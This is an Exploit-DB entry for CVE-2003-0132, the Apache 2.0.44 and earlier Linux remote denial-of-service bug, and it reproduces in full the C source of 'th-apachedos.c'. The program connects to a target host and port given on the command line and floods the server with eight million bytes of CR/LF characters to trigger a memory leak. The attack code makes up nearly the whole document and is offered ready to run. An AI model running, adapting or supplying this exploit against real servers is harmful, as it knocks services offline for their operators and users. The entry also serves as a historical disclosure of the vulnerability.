Apache <= 2.0.44 Linux - Remote Denial of Service Exploit

2003-04-11T00:00:00
ID EDB-ID:11
Type exploitdb
Reporter Daniel Nystram
Modified 2003-04-11T00:00:00

Description

Apache <= 2.0.44 Linux Remote Denial of Service Exploit. CVE-2003-0132. Dos exploit for linux platform

                                        
                                            /******** th-apachedos.c ********************************************************
* *
* Remote Apache DoS exploit *
* ------------------------- *
* Written as a poc for the: *
* 
* This program sends 8000000 \n's to exploit the Apache memory leak. *
* Works from scratch under Linux, as opposed to apache-massacre.c . *
* 
* 
* Daniel Nystrรถm &lt;exce@netwinder.nu&gt; *
* 
* - www.telhack.tk - *
* 
******************************************************** th-apachedos.c ********/

#include &lt;stdio.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;string.h&gt;
#include &lt;errno.h&gt;
#include &lt;sys/types.h&gt;
#include &lt;netinet/in.h&gt;
#include &lt;netdb.h&gt;
#include &lt;sys/socket.h&gt;


int main(int argc, char *argv[])
{
int sockfd;
int count;
char buffer[8000000];
struct sockaddr_in target;
struct hostent *he;

if (argc != 3)
{
fprintf(stderr, "\nTH-apachedos.c - Apache &lt;= 2.0.44 DoS exploit.");
fprintf(stderr, "\n----------------------------------------------");
fprintf(stderr, "\nUsage: %s &lt;Target&gt; &lt;Port&gt;\n\n", argv[0]);
exit(-1);
}

printf("\nTH-Apache DoS\n");
printf("-------------\n");
printf("-&gt; Starting...\n"); 
printf("-&gt;\n");

// memset(buffer, '\n', sizeof(buffer)); /* testing */

for (count = 0; count &lt; 8000000;) 
{
buffer[count] = '\r'; /* 0x0D */
count++;
buffer[count] = '\n'; /* 0x0A */
count++;
}

if ((he=gethostbyname(argv[1])) == NULL)
{
herror("gethostbyname() failed ");
exit(-1);
}

memset(&target, 0, sizeof(target));
target.sin_family = AF_INET;
target.sin_port = htons(atoi(argv[2]));
target.sin_addr = *((struct in_addr *)he-&gt;h_addr);

printf("-&gt; Connecting to %s:%d...\n", inet_ntoa(target.sin_addr), atoi(argv[2]));
printf("-&gt;\n");

if ((sockfd=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) &lt; 0)
{
perror("socket() failed ");
exit(-1);
}

if (connect(sockfd, (struct sockaddr *)&target, sizeof(struct sockaddr)) &lt; 0)
{
perror("connect() failed ");
exit(-1);
}

printf("-&gt; Connected to %s:%d... Sending linefeeds...\n", inet_ntoa(target.sin_addr),
atoi(argv[2]));
printf("-&gt;\n");

if (send(sockfd, buffer, strlen(buffer), 0) != strlen(buffer))
{
perror("send() failed ");
exit(-1);
close(sockfd);
} 


close(sockfd);

printf("-&gt; Finished smoothly, check hosts apache...\n\n");
}

// milw0rm.com [2003-04-11]